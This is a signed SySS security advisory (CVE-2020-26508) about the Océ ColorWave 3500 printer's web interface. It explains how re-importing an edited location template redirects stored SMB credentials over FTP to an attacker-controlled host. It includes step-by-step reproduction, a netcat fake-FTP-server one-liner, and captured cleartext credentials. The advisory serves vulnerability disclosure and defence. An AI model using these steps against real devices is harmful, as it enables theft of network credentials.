-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2020-034 Product: Océ ColorWave 3500 - WebTools Manufacturer: Canon / OCe Affected Version(s): 5.1.1.0 Tested Version(s): 5.1.1.0 Vulnerability Type: Insufficiently Protected Credentials (CWE-522) Risk Level: Low Solution Status: Open Manufacturer Notification: 2020-09-11 Solution Date: 2020-xx-xx Public Disclosure: 2020-10-30 CVE Reference: CVE-2020-26508 Author of Advisory: Zoellner Matthias, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Océ ColorWave 3500 is a business printer and scanner. The manufacturer describes the product as follows (see [1]): "ColorWave 3500 - Rock-solid wide-format printing with unparalleled ease of use" Due to insufficiently protected credentials the product is vulnerable to the extraction of existing SMB credentials via cleartext protocols, like FTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: To allow scanning directly to a SMB share it is possible to store Active Directory credentials on the device. Those credentials are protected in the webinterface of the device via encryption. If parameters of a share, like the path or the protocol, are changed the printer removes the credentials. To be able to manipulate the settings it is necessary to be authenticated in the webinterface as "PowerUser" or higher. This protection can be bypassed via the import/export feature and the credentials can be gained in cleartext. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): To reproduce follow those steps: 1. "Export all Location Templates" via the webinterface: https:///v2/TemplateManager/indexExternalLocation.jsp 2. Open the exportExternalLocationTemplates.zip File and edit the included ExternalLocationTemplates.xml like this: a) Original version: It is necessary to change the path from \\SMB_Server\Printer to the and the protocol from SMB to FTP. b) Edited version: 3. Import the edited .zip file 4. Open the imported template in the webinterface and click "save". This triggers a connection check. 5. The credentials can be received with a fake FTP server or a simple python snippet: $ python -c 'print "220 Welcome!\r\n331 Please specify the password"' | sudo nc -nlvp 21 listening on [any] 21 ... connect to [] from (UNKNOWN) [] 56223 USER SySS\SMB_User PASS SuperS3cure! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The vendor has not yet released a security update. It might be a solution to build a checksum of the combination from path and credentials and drop the credentials when manipulated. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-08-28: Vulnerability discovered 2020-09-11: Vulnerability reported to manufacturer 2020-09-21: Contact retry 2020-10-30: Disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for ColorWave 3500 https://www.canon.co.uk/business-printers-and-faxes/colorwave-3500/specifications/ [2] SySS Security Advisory SYSS-2020-034 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-034.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Matthias Zoellner of SySS GmbH. E-Mail: matthias.zoellner@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Zoellner.asc Key Fingerprint: 36CD 6245 CBBF DA3C 14B5 5C33 B6E2 E969 CDB2 BC91 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEENs1iRcu/2jwUtVwztuLpac2yvJEFAl+a5JMACgkQtuLpac2y vJGLrA/+JALWiKORAEUD6r/AuZqxKqIvOaZQ7YARK6QfB/tLeXDzKVcw2+Cg6n4c l1UmRTU8cmXMwH/Y/3AkYhttAdPDWCMyyZA/pbY/PvyJabUamnUaCXsi7SrrJBXw ued7BLmTcyX6SiHdW/C2wzKHzlUw/HMRUU0ourIvNXdYnROBr+rF/ZbohGSm4OqU GGNDKkAHfA+H6n0PkqOBUdjs3M5GxuroYAc3zxJpjywxgQ5zHLcyFkfmhvQO1dzY aFrqU5MjRzaVhWpobrk4I6PD020aEDhscedDBKIKo8xk+jH430fUWM73WUQOL7/E 7se2e2vcwiqmkaRVLakImfltLu15DFT01qVrx/OY1d520Lqrhgb8X4zhuqTakB2F nyvNqpxX7DT5xvDWKsbsxx0jp1Kb5QA6+A6GPqz/SdMd4GTw2ukuFw/Q/VVma0i8 /j+yrIIfTLCje+nEVjL5xOA03W3e/m+69hujYMN9NIFCarEqgw31/Zg88edfjphc Ch6UrUsK61zUp8pK7LHCQ9MZ4uhLLnjRxTwePnNsSlnhjxxiCSqDeVamQRoWfJUa acdndeV0FtjjOHOx42d0h4B91OdOUL3CpmDk8dByrVJpqSRee7Ax8uuQLf/QgnCL RV5uxVqqs+M3DeEb5uikeoAYFAIH6TIrZKAAchHuQtf4TfQumEE= =CoLZ -----END PGP SIGNATURE-----